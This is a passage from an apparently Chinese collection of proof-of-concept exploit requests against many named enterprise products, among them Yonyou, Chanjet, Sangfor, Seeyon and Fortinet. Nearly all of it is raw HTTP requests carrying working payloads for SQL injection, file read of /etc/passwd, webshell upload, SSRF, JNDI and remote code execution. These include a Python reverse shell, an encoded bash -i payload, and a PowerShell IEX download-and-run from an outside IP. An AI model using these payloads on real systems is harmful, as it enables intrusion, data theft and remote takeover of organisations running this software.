 772 | ------WebKitFormBoundaryVnIIugCdViAmEyK3--
 773 | 
 774 | 
 775 | 
 776 | 
 777 | POST /api/integration/Outter/getOutterSysEncryptClassOperates?a=1.swf HTTP/1.1
 778 | Host: xxxx:xxx
 779 | If-None-Match: "6evu6PUo/Cz"
 780 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
 781 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 782 | Accept-Encoding: gzip, deflate
 783 | If-Modified-Since: Thu, 23 Jun 2022 11:04:04 GMT
 784 | Content-Type: application/x-www-form-urlencoded
 785 | Cache-Control: max-age=0
 786 | Upgrade-Insecure-Requests: 1
 787 | Accept-Language: zh-CN,zh;q=0.9
 788 | Cookie: ecology_JSessionid=aaa_db33mBm_EaOGEO8bz; __randcode__=b7e3d245-5b6b-44ba-b06b-f4b5592d68dc
 789 | 
 790 | 
 791 | 
 792 | 
 793 | POST /interface/outter/outter_encryptclassOperation.jsp?a=1.swf HTTP/1.1
 794 | Host: xxxx:xxx
 795 | If-None-Match: "6evu6PUo/Cz"
 796 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
 797 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 798 | Accept-Encoding: gzip, deflate
 799 | If-Modified-Since: Thu, 23 Jun 2022 11:04:04 GMT
 800 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryITdrx
 801 | Cache-Control: max-age=0
 802 | Upgrade-Insecure-Requests: 1
 803 | Accept-Language: zh-CN,zh;q=0.9
 804 | Cookie: ecology_JSessionid=aaa_db33mBm_EaOGEO8bz; __randcode__=b7e3d245-5b6b-44ba-b06b-f4b5592d68dc
 805 | 
 806 | 
 807 | ------WebKitFormBoundaryITdrxxca8L1Xo7Rq
 808 | Content-Disposition: form-data; name="operation"
 809 | 
 810 | test
 811 | ------WebKitFormBoundaryITdrxxca8L1Xo7Rq
 812 | Content-Disposition: form-data; name="plaintext"
 813 | 
 814 | 马子
 815 | ------WebKitFormBoundaryITdrxxca8L1Xo7Rq
 816 | Content-Disposition: form-data; name="id"
 817 | 
 818 | 2
 819 | ------WebKitFormBoundaryITdrxxca8L1Xo7Rq
 820 | Content-Disposition: form-data; name="x"; filename="x"
 821 | 
 822 | 1
 823 | ------WebKitFormBoundaryITdrxxca8L1Xo7Rq--
 824 | 
 825 | NAME:\浪潮云\浪潮GS PurBidSupplementSrv.asmx任意文件读取.txt
 826 | POC:
 827 | POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1
 828 | Host:
 829 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 830 | Accept-Encoding: gzip, deflate, br
 831 | Cookie: GSPWebLanguageKey=zh-CN
 832 | Upgrade-Insecure-Requests: 1
 833 | 
 834 | <?xml version="1.0"?>
 835 | <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
 836 | <soap:Body xmlns:m="http://tempuri.org/">
 837 | <m:downLoadFile>
 838 | <m:filePath>C:\Windows\win.ini</m:filePath>
 839 | <m:offset>0</m:offset>
 840 | </m:downLoadFile>
 841 | </soap:Body>
 842 | </soap:Envelope>
 843 | 
 844 | NAME:\深信服\深信服EDR rce CVE-2025-34041.txt
 845 | POC:
 846 | GET /tool/log/c.php?strip_slashes=system&limit=whoami HTTP/1.1
 847 | 
 848 | POST /tool/log/c.php HTTP/1.1
 849 | Host: x.x.x.x
 850 | Upgrade-Insecure-Requests: 1
 851 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
 852 | Content-Type: application/x-www-form-urlencoded;charset=utf-8
 853 | Accept-Language: zh-CN,zh;q=0.9
 854 | Content-Length: 256
 855 | 
 856 | strip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 857 | 
 858 | NAME:\深信服\深信服OSM portal_login（堡垒机）rce.txt
 859 | POC:
 860 | POST /fort/portal_login HTTP/1.1
 861 | Host: 
 862 | Cookie: FORTSESSIONID=78DFD83A276124B65ECA5D316D66D47F
 863 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
 864 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
 865 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 866 | Accept-Encoding: gzip, deflate, br
 867 | Upgrade-Insecure-Requests: 1
 868 | Sec-Fetch-Dest: document
 869 | Sec-Fetch-Mode: navigate
 870 | Sec-Fetch-Site: none
 871 | Sec-Fetch-User: ?1
 872 | Priority: u=0, i
 873 | Te: trailers
 874 | Connection: close
 875 | Content-Type: application/json
 876 | Content-Length: 94
 877 | 
 878 | "{\"userName\":\"Bob\", \"loginUrl\":\"`id`\", \"role\": \"\", \"password\": \"123456789\"}" #
 879 | 
 880 | NAME:\深信服\深信服运维安全管理系统set_port存在RCE.txt
 881 | POC:
 882 | POST /fort/system;login/netConfig/set_port HTTP/1.1
 883 | Host: 
 884 | 
 885 | select=6379+-j+DROP%0A%62%61%73%68%20%2d%63%20%24%28%65%63%68%6f%20%5a%57%4e%6f%62%79%41%69%55%45%4e%57%64%6d%52%59%55%58%56%6b%4d%30%70%77%5a%45%64%56%62%30%6c%71%52%57%6c%4c%56%48%4e%73%55%47%63%39%50%53%49%67%66%47%4a%68%63%32%55%32%4e%43%41%74%5a%43%41%2b%49%43%39%31%63%33%49%76%62%47%39%6a%59%57%77%76%64%47%39%74%59%32%46%30%4c%33%64%6c%59%6d%46%77%63%48%4d%76%5a%6d%39%79%64%43%39%30%63%6e%56%7a%64%43%39%32%5a%58%4a%7a%61%57%39%75%4c%32%78%76%5a%79%35%71%63%33%41%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%20%2d%69%29%0a%65%78%69%74%3b%0Aecho&Unselect=22,443,9443
 886 | 
 887 | NAME:\灵当\灵当 CRM getLogInfo.php文件上传漏洞.txt
 888 | POC:
 889 | <=V8.6.3.3.11
 890 | 
 891 | POST /crm/WeiXinApp/CallRecordLog/getLogInfo.php?userid=&gettype=uploadfile&uploadfilename=221.php......&callednumber=&sessionvalue=ca6ee37ed4ea2c709b2d36d1349cacff HTTP/1.1
 892 | Host: your-ip
 893 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
 894 | 
 895 | ------WebKitFormBoundary7MA4YWxkTrZu0gW
 896 | Content-Disposition: form-data; name="uploaded_file"; filename="123321.avi"
 897 | Content-Type: image/jpeg
 898 | 
 899 | <?php
 900 | print "Hello, World!";
 901 | ?>
 902 | ------WebKitFormBoundary7MA4YWxkTrZu0gW--
 903 | 
 904 | NAME:\理政\理正企业综合管理系统LzMIS任意SQL语句执行.txt
 905 | POC:
 906 | POST /ajax/LeadingMIS.CustomExp.AjaxExp,LeadingMIS.CustomExp.ashx?_method=ExecSQLScalarToString&_session=no HTTP/1.1
 907 | Host: 
 908 | Accept-Encoding: gzip
 909 | Connection: keep-alive
 910 | Content-Length: 23
 911 | Content-Type: application/x-www-form-urlencoded
 912 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.1013.22 Safari/537.36
 913 | 
 914 | strSQL=select @@version
 915 | 
 916 | NAME:\用友\用友 NC IMetaWebService4BqCloud 数据源 SQL 注入.txt
 917 | POC:
 918 | POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
 919 | Cache-Control: max-age=0
 920 | Upgrade-Insecure-Requests: 1
 921 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
 922 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 923 | Accept-Encoding: gzip, deflate, br
 924 | Accept-Language: zh-CN,zh;q=0.9
 925 | Cookie: JSESSIONID=09133CFE3A7B0CE8341AB1A7DEDFCCDE.server
 926 | Connection: keep-aliveSOAP
 927 | Action: urn:loadFields
 928 | Content-Type: text/xml;charset=UTF-8
 929 | Host: 
 930 | Content-Length: 350
 931 | 
 932 | <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud">
 933 |    <soapenv:Header/>   
 934 |    <soapenv:Body>      
 935 |    <imet:loadFields>         
 936 |    <!--type: string-->         
 937 |    <imet:string>SmartModel^1';*</imet:string>      
 938 |    </imet:loadFields>   
 939 |    </soapenv:Body>
 940 | </soapenv:Envelope>
 941 | 
 942 | NAME:\用友\用友BIP数据应用服务未授权访问GLSyncService.asmx.txt
 943 | POC:
 944 | GET /bi/api/SemanticModel/GetOlapConnectionList/?token=e30fe47a-f33e-463e-bc4a-843957ca88dd_263720ea7e397482da220115cae828_1214162142339 HTTP/1.1
 945 | 
 946 | NAME:\用友\用友FE协同平台uploadFile.jsp存在文件上传.txt
 947 | POC:
 948 | POST /service/FileManageServlet HTTP/1.1
 949 | Host:
 950 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
 951 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 952 | Accept-Encoding: gzip, deflate, br
 953 | Accept-Language: en-US,en;q=0.9
 954 | Connection: close
 955 | Content-Type: application/octet-stream
 956 | 
 957 | {{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFactorI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x0cw\x08\x00\x00\x00\x10\x00\x00\x00\x03t\x00\x04patht\x00\x12C:\\Windows\\win.init\x00\x06dsNamet\x00\x03plmt\x00\x08operTypet\x00\x0ddownloadlocalx")}}
 958 | 
 959 | NAME:\用友\用友NC changeEvent接口存在SQL注入漏洞.txt
 960 | POC:
 961 | POST /portal/pt/oacoSchedulerEvents/changeEvent?pageId=login HTTP/1.1
 962 | Host:
 963 | Content-Type: application/x-www-form-urlencoded
 964 | 
 965 | event_id=1' AND 1=dbms_pipe.receive_message('RDS',5)--+#&startDate=2025-07-01 00:00:00&startDate_old=2025-07-01 24:00:00
 966 | 
 967 | NAME:\用友\用友NC getFormItem doPost SQL注入.txt
 968 | POC:
 969 | POST /portal/pt/servlet/getFormItem/doPost?pageId=login&clazz=nc.uap.wfm.vo.base.ProDefBaseVO&proDefPk=1 HTTP/1.1
 970 | Host: 
 971 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
 972 | Content-Length: 19
 973 | 
 974 | 
 975 | NAME:\用友\用友NC getFormltem doPost SQL注入.txt
 976 | POC:
 977 | /portal/pt/servlet/getFormltem/doPost
 978 | 
 979 | NAME:\用友\用友NC qrySubPurchaseOrgByParentPk 存在SQL注入.txt
 980 | POC:
 981 | POST /ebvp/register/qrySubPurchaseOrgByParentPk HTTP/1.1
 982 | Host: 
 983 | Content-Type: application/x-www-form-urlencoded
 984 | 
 985 | pk_group=1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('RDS',5) --
 986 | 
 987 | NAME:\用友\用友NC-Cloud IBapIOService存在SQL注入.txt
 988 | POC:
 989 | POST /uapws/service/nc.itf.bap.service.IBapIOService HTTP/1.1
 990 | Host: 
 991 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
 992 | Accept: */*
 993 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 994 | Accept-Encoding: gzip, deflate
 995 | Connection: close
 996 | Content-Type: text/xml 
 997 | 
 998 | <?xml version="1.0" encoding="UTF-8" standalone="no"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gs="http://service.bap.itf.nc/IBapIOService">    <soapenv:Header/>    <soapenv:Body>        <gs:getBapTableDatas>            <gs:stringarrayItem>                DWQueue@MessageQueue' AND 1=UTL_INADDR.GET_HOST_ADDRESS('~'||(user)||'~')-- abc            </gs:stringarrayItem>        </gs:getBapTableDatas>    </soapenv:Body></soapenv:Envelope>
 999 | 
1000 | NAME:\用友\用友OA系统U8Cloud FilterCondAction SQL注入.txt
1001 | POC:
1002 | GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.bi.report.rep.FilterCondAction&method=execute&repID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
1003 | 
1004 | NAME:\用友\用友U9 Cloud DynamaticExport.aspx 接口任意文件下载.txt
1005 | POC:
1006 | GET /Portal/Print/DynamaticExport.aspx?filePath=../../etc/passwd HTTP/1.1
1007 | 
1008 | NAME:\用友\用友U9 Cloud printDynamaticExport.aspx 接口任意文件下载.txt
1009 | POC:
1010 | GET Portal/Print/DynamaticExport.aspx?filePath=../../etc/passwd HTTP/1.1
1011 | 
1012 | NAME:\用友\用友时空KSOA workslist.jsp SQL注入.txt
1013 | POC:
1014 | GET /worksheet/workslist.jsp?id=1';WAITFOR+DELAY+'0:0:3 HTTP/1.1
1015 | 
1016 | NAME:\畅捷通\用友 畅捷通-TPlus SQL注入.txt
1017 | POC:
1018 | POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
1019 | Host: 
1020 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.445.106 Safari/537.36
1021 | Content-Length: 248
1022 | Connection: close
1023 | Content-Type: application/json
1024 | Accept-Encoding: gzip
1025 | 
1026 | {"accNum": "3' AND 5227 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5227=5227) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(120)+CHAR(113)))-- NCab", "functionTag": "SYS0104", "url": ""}
1027 | 
1028 | NAME:\畅捷通\用友 畅捷通AddressSettingController存在SSRF.txt
1029 | POC:
1030 | POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
1031 | Host:
1032 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
1033 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
1034 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1035 | Accept-Encoding: gzip, deflate
1036 | Connection: close
1037 | Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161
1038 | Upgrade-Insecure-Requests: 1
1039 | Priority: u=0, i
1040 | Content-Type: application/x-www-form-urlencoded
1041 | Content-Length: 36
1042 | 
1043 | {
1044 |   "address":"bftsce.dnslog.cn"
1045 | }
1046 | 
1047 | NAME:\畅捷通\用友 畅捷通T+ FileUploadHandler任意文件上传.txt
1048 | POC:
1049 | POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1
1050 | Host: 
1051 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.2527.28 Safari/537.36
1052 | Content-Length: 554
1053 | Connection: close
1054 | Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6
1055 | Accept-Encoding: gzip
1056 | 
1057 | --f95ec6be8c3acff8e3edd3d910d3b9a6
1058 | Content-Disposition: form-data; name="file"; filename="123.asp"
1059 | Content-Type: image/jpeg
1060 | 
1061 | <%
1062 | 
1063 | Response.Write chr(101)&chr(49)&chr(54)&chr(53)&chr(52)&chr(50)&chr(49)&chr(49)&chr(49)&chr(48)&chr(98)&chr(97)&chr(48)&chr(51)&chr(48)&chr(57)&chr(57)&chr(97)&chr(49)&chr(99)&chr(48)&chr(51)&chr(57)&chr(51)&chr(51)&chr(55)&chr(51)&chr(99)&chr(53)&chr(98)&chr(52)&chr(51)
1064 | 
1065 | CreateObject("Scripting.FileSystemObject").DeleteFile(server.mappath(Request.ServerVariables("SCRIPT_NAME")))
1066 | 
1067 | %>
1068 | 
1069 | --f95ec6be8c3acff8e3edd3d910d3b9a6--
1070 | 
1071 | 
1072 | 
1073 | 
1074 | ---------------------------------------------------------------------------------------------------------------------------
1075 | 
1076 | 
1077 | GET /tplus/Userfiles/123.asp HTTP/1.1
1078 | 
1079 | NAME:\畅捷通\用友 畅捷通T+ getdecallusers 存在信息泄露.txt
1080 | POC:
1081 | GET /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
1082 | 
1083 | NAME:\畅捷通\用友 畅捷通T+ GLSyncService.asmx SQL注入.txt
1084 | POC:
1085 | POST /tplus/GLSyncService.asmx HTTP/1.1
1086 | Host: 
1087 | SOAPAction: "http://www.chanjet.com/GetSourceAccountDataTable"
1088 | Content-Type: text/xml; charset=utf-8
1089 | 
1090 | <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <GetSourceAccountDataTable xmlns="http://www.chanjet.com/">      <versionType>' UNION ALL SELECT NULL,@@VERSION,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VsIH</versionType>    </GetSourceAccountDataTable>  </soap:Body></soap:Envelope>
1091 | 
1092 | NAME:\畅捷通\用友 畅捷通T+ keyEdit.aspx 存在SQL注入.txt
1093 | POC:
1094 | GET /tplus/UFAQD/keyEdit.aspx?KeyID=222%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
1095 | 
1096 | NAME:\畅捷通\用友畅捷通TPLUS AccountClearControler SQL注入.txt
1097 | POC:
1098 | GET /tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx?method=GetisInitBCRetail HTTP/1.1
1099 | 
1100 | NAME:\畅捷通\畅捷通CRM newleadset.php 存在SQL注入.txt
1101 | POC:
1102 | /lead/newleadset.php?gblOrgID=1+AND+%28SELECT+5244+FROM+%28SELECT%28SLEEP%289%29%29%29HAjH%29--+-&DontCheckLogin=1
1103 | 
1104 | NAME:\畅捷通\畅捷通T+Load处存在SQL注入.txt
1105 | POC:
1106 | //tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=%27);declare%20%40shell%20int%3Bexec%20sp_oacreate%20%22wscript.shell%22%2C%40shell%20output%3Bexec%20sp_oamethod%20%40shell%2C%22run%22%2Cnull%2C%22sqlps%20IEX%20((new-object%20net.webclient).downloadstring('http%3A%2F%2F103.199.106.62%3A6000%2Fbeta'))%22%3b--+
1107 | 
1108 | NAME:\百易云\百易云资管系统imaRead.make.php SQL注入.txt
1109 | POC:
1110 | POST /adminx/imaRead.make.php?act=remake HTTP/1.1
1111 | Host:
1112 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
1113 | 
1114 | feeItem[]=1+AND+updatexml(1,concat(0x7e,md5(12345678)),1)
1115 | 
1116 | NAME:\科立讯\福建科立讯通信有限公司 logout.php SQL注入.txt
1117 | POC:
1118 | GET /custom/zx/logout.php?sign=1'+AND+(SELECT+4068+FROM+(SELECT(SLEEP(16)))Vgsc)--+qhh HTTP/1.1
1119 | 
1120 | NAME:\紫光\紫光System WorkFlow download任意文件读取.txt
1121 | POC:
1122 | POST /System/WorkFlow/download.html?path=C:\Windows\win.ini HTTP/1.1
1123 | Accept-Encoding: gzip, deflate
1124 | 
1125 | --vow8ojiofbpypwih3t3i
1126 | Content-Disposition: form-data; name="userID"
1127 | 
1128 | admin
1129 | --vow8ojiofbpypwih3t3i
1130 | Content-Disposition: form-data; name="fondsid"
1131 | 
1132 | 1
1133 | --vow8ojiofbpypwih3t3i
1134 | Content-Disposition: form-data; name="comid"
1135 | 
1136 | 1
1137 | --vow8ojiofbpypwih3t3i
1138 | Content-Disposition: form-data; name="token"
1139 | 
1140 | 5117e82385cef4c12547fdd4c028b97a1-1
1141 | --vow8ojiofbpypwih3t3i--
1142 | 
1143 | NAME:\维达\维达外贸客户关系管理系统 sendmailview.jsp SQL注入.txt
1144 | POC:
1145 | GET /wap/common/sendmailview.jsp?commonid=1';WAITFOR+DELAY+'0:0:4'-- HTTP/1.1
1146 | 
1147 | NAME:\网仕\上海网仕科技 Transcoder MS index.php SQL注入.txt
1148 | POC:
1149 | POST /webtrans/index.php?controller=user%action=login HTTP/1.1
1150 | Host: 
1151 | 
1152 | name=testaaa;) AND (SELECT 3333 FROM (SELECT(SLEEP(4)))xSEI) AND ('aFKS'='aFKS&pass=QWR5U2VjCg%3D%3D&lang=zh_CN
1153 | 
1154 | NAME:\美特CRM\美特CRM存在druid未授权访问.txt
1155 | POC:
1156 | fofa：
1157 | body="MetaCRM6"||title="MetaCRM7客户关系管理系统"
1158 | 
1159 | poc：
1160 | GET /druid/websession.html
1161 | 
1162 | NAME:\群晖\群晖ABM全局客户端密钥信息泄露CVE-2025-4679.txt
1163 | POC:
1164 | NAS OS<= DSM 7.2.2-72806
1165 | 
1166 | POST /ActiveBackupForMicrosoft365/dsm7_office365.php HTTP/2
1167 | Host: synooauth.synology.com
1168 | 
1169 | action=SYNOGetAccessToken&code=1.Aa4ABLPUicJgkEm4oYYvptoHGdo08rQaOk1[...]&state=SecretExposurePoC&location=RandomNonValidDSMLocationURI
1170 | 
1171 | NAME:\联想\联想网盘write存在任意文件上传漏洞.txt
1172 | POC:
1173 | POST /write?neid=1&hash=../../../../../../../dragonball/srv/tomcat/webapps/stream_server/ttt.txt&status=1 HTTP/1.1
1174 | Host:xxxx
1175 | Cache-Control:max-age=0
1176 | Sec-Ch-Ua:"Chromium";v="117", "Not;A=Brand";v="8"
1177 | Sec-Ch-Ua-Mobile:?0
1178 | Sec-Ch-Ua-Platform:"Windows"
1179 | Upgrade-Insecure-Requests:1
1180 | User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
1181 | Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1182 | Sec-Fetch-Site:none
1183 | Sec-Fetch-Mode:navigate
1184 | Sec-Fetch-User:?1
1185 | Sec-Fetch-Dest:document
1186 | Accept-Language:zh-CN,zh;q=0.9
1187 | Connection:close
1188 | Content-Type:application/octet-stream
1189 | Accept-Encoding:gzip, deflate
1190 | Content-Length:8
1191 | 
1192 | Testtest
1193 | 
1194 | 
1195 | NAME:\联软\联软UniSDP 零信任访问控制系统 emm-coreoauthtoken 信息泄露.txt
1196 | POC:
1197 | GET /emm-core/oauth/token HTTP/1.1
1198 | 
1199 | NAME:\致远\致远OA任意文件上传CVE-2025-34040wpsAssistServlet.txt
1200 | POC:
1201 | GET /seeyon/wpsAssistServlet?flag=save&realFileType=/../../../ApacheJetspeed/webapps/ROOT/test.txt&fileId=1&123123= HTTP/1.1
1202 | 
1203 | NAME:\若依\若依任意⽂件读取sendMessageWithAttachment.txt
1204 | POC:
1205 | GET /demo/mail/sendMessageWithAttachment?to=xxxxxx@163.com&subject=Test-Mail&text=This%20is%20a%20test%20message&filePath=/etc/passwd HTTP/1.1
1206 | 
1207 | NAME:\蓝凌\蓝凌OA远程命令执行dataxml.tmpl.txt
1208 | POC:
1209 | POST /ekp/data/sys-common/dataxml.tmpl  HTTP/1.1
1210 | Host: 
1211 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0)  Gecko/20100101 Firefox/92.0
1212 | Accept:  text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
1213 | Accept-Language:  zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1214 | Accept-Encoding: gzip, deflate
1215 | Connection: close
1216 | Upgrade-Insecure-Requests: 1
1217 | Content-Type: application/x-www-form-urlencoded
1218 | Content-Length: 192
1219 | 
1220 | s_bean=ruleFormulaValidate&script=try {
1221 | String cmd = "ping {{interactsh-url}}";
1222 | Process child = Runtime.getRuntime().exec(cmd);
1223 | } catch (IOException e) {
1224 | System.err.println(e);
1225 | }
1226 | 
1227 | NAME:\通达\通达OA v2014 get_contactlist.php 敏感信息泄漏.txt
1228 | POC:
1229 | GET /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 HTTP/1.1
1230 | 
1231 | NAME:\金和\金和OA ModuleTaskView.aspx SQL注入.txt
1232 | POC:
1233 | POST /c6/Jhsoft.Web.dailytaskmanage/ModuleTaskView.aspx/ HTTP/1.1
1234 | Host: 
1235 | Content-Type: application/x-www-form-urlencoded
1236 | 
1237 | _ListPage1LockNumber=1&_ListPage1RecordCount=0&__VIEWSTATE=xxxxx&__VIEWSTATEGENERATOR=09BBB40C&__EVENTTARGET=&__EVENTARGUMENT=&OriginModule=crmexec&OriginID='WAitFor+DelaY'0:0:5'--
1238 | 
1239 | NAME:\金和\金和OA SQL注入漏洞Tasktreejson接口.txt
1240 | POC:
1241 | GET /C6/JHSoft.Web.DailyTaskManage/TaskTreeJSON.aspx/?id=1%27+union+all+select+null%2C%28select+@@VERSION%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--+  HTTP/1.1
1242 | 
1243 | NAME:\金和\金和OA TaskReportConfirm.aspx SQL注入.txt
1244 | POC:
1245 | POST /c6/Jhsoft.Web.dailytaskmanage/TaskReportConfirm.aspx/ HTTP/1.1
1246 | Host:
1247 | Content-Type: application/x-www-form-urlencoded
1248 | 
1249 | __EVENTTARGET=xxxx&__EVENTARGUMENT=&__VIEWSTATE=xxxx&txtTaskReportExplain=&chkCallViewers=on&hidReportID=0&__VIEWSTATEGENERATOR=xxxxx&id='WAitFor DelaY'0:0:5'--
1250 | 
1251 | NAME:\金蝶\金蝶Apusic应用服务器loadTree-JNDI注入漏洞.txt
1252 | POC:
1253 | POST /appmonitor/protect/jndi/loadTree HTTP/1.1
1254 | Host: your_ip
1255 | Cache-Control: max-age=0
1256 | Upgrade-Insecure-Requests: 1
1257 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1258 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1259 | Accept-Encoding: gzip, deflate, br
1260 | Accept-Language: zh-CN,zh;q=0.9
1261 | Connection: close
1262 | Content-Type: application/x-www-form-urlencoded
1263 | Content-Length: 55
1264 | 
1265 | jndiName=ldap://***.***.***.***/Basic/Command/calc
1266 | 
1267 | NAME:\金蝶\金蝶云星空 DynamicFormService.CloseForm.common.kdsvc 远程代码执行.txt
1268 | POC:
1269 | POST /k3cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DynamicForm.DynamicFormService.CloseForm.common.kdsvc HTTP/1.1
1270 | cmd:dir
1271 | 
1272 | {"ap0":"AAAAAAAA"}
1273 | 
1274 | NAME:\雄伟\雄伟科技智慧食堂系统任意用户密码重置.txt
1275 | POC:
1276 | /Account/ForgetPasswordJson
1277 | 
1278 | NAME:\飞塔\飞塔Authorization SQL注入CVE-2025-25257.txt
1279 | POC:
1280 | GET /api/fabric/device/status HTTP/1.1
1281 | Host: 
1282 | Authorization: Bearer AAAAAA'/**/or/**/sleep(5)--/**/-'
1283 | 
1284 | 
1285 | GET /cgi-bin/x.cgi HTTP/1.1
1286 | User-Agent:ls /
1287 | 
1288 | NAME:\龙采\龙采商城系统 auditing 接口存在SQL注入.txt
1289 | POC:
1290 | POST /coupon/auditing HTTP/1.1
1291 | Host: 
1292 | 
1293 | id=1%20and%20updatexml(1,concat(0x7e,@@version,0x7e),1)
1294 | 
1295 | 
1296 | 
1297 | 深信服&dp OSM(堡垒机)rce
1298 | POST /fort/portal_login HTTP/1.1
1299 | Host: 
